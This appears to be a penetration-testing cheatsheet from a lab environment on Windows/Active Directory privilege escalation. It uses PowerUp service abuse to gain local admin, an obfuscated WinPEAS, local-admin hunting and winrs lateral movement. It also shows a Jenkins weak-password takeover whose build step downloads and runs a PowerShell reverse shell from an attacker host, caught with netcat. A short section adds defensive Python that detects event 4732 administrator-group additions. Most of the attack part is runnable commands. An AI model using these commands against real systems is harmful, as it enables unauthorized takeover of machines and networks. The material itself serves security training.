# Cheatsheet - Fast Commands (PRIVILEGE ESCALATION)

## Enumeration - Local Privilege Escalation

### View your current privileges in the domain

```bash
whoami /all
## groups, privileges, SID, special permissions
net user %username% /domain
## Domain Admins, RDP Users, Backup Operators, etc.
net localgroup administrators
## Check who holds local admin privileges
```

***

> With PowerUp
>
> ```
> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
> . C:\AD\Tools\PowerUp.ps1
> ```

```
Invoke-AllChecks
```

<figure><img src="/files/U3J5vcu5FjIxcVALnfH5" alt=""><figcaption></figcaption></figure>

***

### Service abuse with Invoke-ServiceAbuse

> Let's use the abuse function for Invoke-ServiceAbuse and add our current domain user to the local Administrators group. Invoke-ServiceAbuse (from PowerUp) temporarily changes the binary path of a service whose configuration the current user can modify, restarts it so the command runs as the service account (usually LocalSystem), and then restores the original path.

```
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student113' -Verbose
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252F5RCK1D43I1k3yJpw7BTy%252Fimage.png%3Falt%3Dmedia%26token%3Daa8d3d7a-2a47-4e18-83ab-ee3842546fe7&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=437f79f2&#x26;sv=2" alt=""><figcaption></figcaption></figure>

We can see that dcorp\studentx is now a local administrator. Just log off and log on again (group membership is applied to the access token at logon) and we have local administrator privileges!
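The artefact this step leaves on the target is a member added to the built-in Administrators group, which Windows records as Security event 4732. The following is an added detection example, not part of the original cheatsheet: it runs over constructed JSON-lines records (field names are an assumption, modelled on common EVTX-to-JSON exports) and flags additions to Administrators, marking those performed by a computer account, which is how a service running as LocalSystem appears in the log.

```python
import json

# Well-known SID of the built-in local Administrators group, the group
# Invoke-ServiceAbuse adds the current user to.
BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample Security-log records, one JSON object per line. Only the
# third line is the pattern of interest: a member added to Administrators by
# the computer account (SYSTEM-level service), not by an interactive admin.
SAMPLE_EVENTS = r"""{"EventID": 4624, "Computer": "dcorp-std113", "SubjectUserName": "student113", "LogonType": 2}
{"EventID": 4732, "Computer": "dcorp-std113", "TargetSid": "S-1-5-32-555", "TargetUserName": "Remote Desktop Users", "MemberName": "DCORP\\helpdesk", "SubjectUserName": "Administrator"}
{"EventID": 4732, "Computer": "dcorp-std113", "TargetSid": "S-1-5-32-544", "TargetUserName": "Administrators", "MemberName": "DCORP\\student113", "SubjectUserName": "DCORP-STD113$"}
{"EventID": 4733, "Computer": "dcorp-std113", "TargetSid": "S-1-5-32-544", "TargetUserName": "Administrators", "MemberName": "DCORP\\student113", "SubjectUserName": "DCORP-STD113$"}
"""


def parse_events(jsonl):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def find_local_admin_additions(events):
    """Return one alert per 4732 event whose target group is Administrators.

    Event 4732 is "A member was added to a security-enabled local group".
    The alert carries by_computer_account=True when the subject name ends
    in '$', i.e. the change was made from a SYSTEM-level (service) context.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4732:
            continue
        if ev.get("TargetSid") != BUILTIN_ADMINISTRATORS_SID:
            continue
        subject = ev.get("SubjectUserName", "")
        alerts.append({
            "host": ev.get("Computer"),
            "member": ev.get("MemberName"),
            "subject": subject,
            "by_computer_account": subject.endswith("$"),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_local_admin_additions(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Removal (4733) is deliberately not matched, so the tool restoring the service afterwards does not hide the earlier addition.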

***

## Local Privilege Escalation - WinPEAS <a href="#local-privilege-escalation-winpeas" id="local-privilege-escalation-winpeas"></a>

Run WinPEAS with the following command. Note that we use an obfuscated version of WinPEAS, started through Loader.exe:

```
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\winPEASx64.exe -args notcolor log
```

<figure><img src="/files/LH4F6CoZd9debv2YIJ6U" alt=""><figcaption></figcaption></figure>

***

## Local Privilege Escalation - PrivEscCheck <a href="#local-privilege-escalation-privesccheck" id="local-privilege-escalation-privesccheck"></a>

Similarly, we can use PrivEscCheck (<https://github.com/itm4n/PrivescCheck>) for a nice summary of possible privilege escalation opportunities:

```
. C:\AD\Tools\PrivEscCheck.ps1
```

```
Invoke-PrivescCheck
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252F7H7qxV3e94XCoh7Qtq2h%252Fimage.png%3Falt%3Dmedia%26token%3De29efb38-8887-4a82-949d-eb1fa78544d2&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=6b80c056&#x26;sv=2" alt=""><figcaption></figcaption></figure>

***

## User Hunt for Local Admin access

To identify machines in the domain where studentx has local administrative access, use Find-PSRemotingLocalAdminAccess.ps1:

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
```

```
Find-PSRemotingLocalAdminAccess
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252F1VUMHVTPq3cCaplZOV4d%252Fimage.png%3Falt%3Dmedia%26token%3D87f03bca-e003-4ff8-a060-1c1d99f64d5b&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=f7e37514&#x26;sv=2" alt=""><figcaption></figcaption></figure>

> In other words: on which domain machines am I a local admin?

Studentx has administrative access on dcorp-adminsrv and on the student machine.

### Connect to other domain machines as local admin

```
winrs -r:dcorp-adminsrv cmd
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FcaUMSruTgSJnuYeJHf3O%252Fimage.png%3Falt%3Dmedia%26token%3Dfd045b22-1b80-4344-b811-5fb18da0f31b&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=3fedea11&#x26;sv=2" alt=""><figcaption></figcaption></figure>

```
set username
set computername
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252F1TzaBrpMILGcFHnCMHqP%252Fimage.png%3Falt%3Dmedia%26token%3De852af28-2d11-4b71-9ee3-af6972ad3dc7&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=c40e4353&#x26;sv=2" alt=""><figcaption></figcaption></figure>

***

### PowerShell Remoting

> Note: Remember to use a new InviShell session
>
> ```
> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
> ```

```
## Search
Find-PSRemotingLocalAdminAccess
## Connect
winrs -r:dcorp-adminsrv cmd
## or
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
## Afterwards, confirm who you are on the remote host
$env:username
```

<figure><img src="/files/5QEfDyc7vOQNplDBhrFM" alt=""><figcaption></figcaption></figure>

***

## Abuse a Jenkins instance

If we find a Jenkins instance/login, try logging in with the username as the password (username:username).

Once you are in, modify or create a project and insert the reverse shell command as a Windows batch build step -->

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FUZNDtG42gIh0ogOVCDet%252Fimage.png%3Falt%3Dmedia%26token%3Db795b940-7d26-47d8-b848-1428b2f36e1f&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=ad1d865&#x26;sv=2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252F95UhRBgqZC3UVy064Ic6%252Fimage.png%3Falt%3Dmedia%26token%3Ddaa3db46-b170-4a8d-b265-9d3ff223a0ea&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=befb7ce8&#x26;sv=2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FzzlsF3krpjrjyY7cKMvq%252Fimage.png%3Falt%3Dmedia%26token%3Da23ad261-4cc3-4b35-91c4-cd6a3a139c88&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=f35dcf18&#x26;sv=2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252Fds5mjbpQDDnjnBKlk0nw%252Fimage.png%3Falt%3Dmedia%26token%3Dca12c1b1-af92-4f85-801a-aca731cc5203&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=182b9d72&#x26;sv=2" alt=""><figcaption></figcaption></figure>

```
powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.113 -Port 443
```

> Double check the following:
>
> 1. Remember to host the reverse shell on a local web server on your student VM. You can find hfs.exe in the C:\AD\Tools directory of your student VM. Note that HFS goes in the system tray when minimized. You may like to click the up arrow on the right side of the taskbar to open the system tray and double-click on the HFS icon to open it again.
> 2. Also, make sure to add an exception or turn off the firewall on the student VM.
> 3. Check if there is any typo or extra space in the Windows Batch command that you used above in the Jenkins project.
> 4. After you build the project below, check the 'Console Output' of the Jenkins Project to know more about the error.

### Share a folder with Invoke-PowerShellTcp

First, start HFS to enable the share -->

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FLFOapd2O1bOj1eLq3rZ1%252Fimage.png%3Falt%3Dmedia%26token%3D4b0da185-491e-4e1a-a672-d5934cff8bbd&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=53a2065f&#x26;sv=2" alt=""><figcaption></figcaption></figure>

Then upload Invoke-PowerShellTcp.ps1 -->

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FqsCZmVbHTRxjAzn4qTCx%252Fimage.png%3Falt%3Dmedia%26token%3D341189ae-c60d-48d8-8cde-14f22a330aa4&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=37b11992&#x26;sv=2" alt=""><figcaption></figcaption></figure>

> Note: This is the URL to copy and paste into the command:
>
> powershell.exe iex (iwr ***<http://172.16.100.113/Invoke-PowerShellTcp.ps1>*** -UseBasicParsing); ...

Once the payload is hosted and the share is running, remember to turn off the Windows Firewall on the student VM (or add an exception):

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FINeQ2jeekiCRyAutrjhW%252Fimage.png%3Falt%3Dmedia%26token%3Db08bd60b-fac7-4e0b-998f-b918884df21f&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=a51a192b&#x26;sv=2" alt=""><figcaption></figcaption></figure>

Once everything is in place, start the netcat listener and run the build -->

```
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FW26tXMj3an8sUO9rFGEE%252Fimage.png%3Falt%3Dmedia%26token%3D8a0787ca-b117-490a-ad23-afe83e4f5d3c&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=f9eca2a6&#x26;sv=2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252FKYHuSFKy78bJGniLLKLu%252Fimage.png%3Falt%3Dmedia%26token%3D090f0fa3-210f-4954-9418-d3fb74f7bfed&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=9e4a12f9&#x26;sv=2" alt=""><figcaption></figcaption></figure>

> Note: I don't need to disable anything. If you have issues, reboot the machine.

<figure><img src="/files/8jX5EwFbYqWGt5udD1RH" alt=""><figcaption></figcaption></figure>

We can now run commands on the reverse shell:

```
$env:username
ipconfig
$env:computername
```

<figure><img src="https://eldeim.gitbook.io/brain_fuck/~gitbook/image?url=https%3A%2F%2F3697469405-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FSrcwXlKGkwhzbrKa8vLU%252Fuploads%252F1QYlnzPPhF3EbJLzeAqA%252Fimage.png%3Falt%3Dmedia%26token%3Dc3b4fe31-48e0-460e-9cf4-d2c2e0a7a0e9&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=29dad36d&#x26;sv=2" alt=""><figcaption></figcaption></figure>
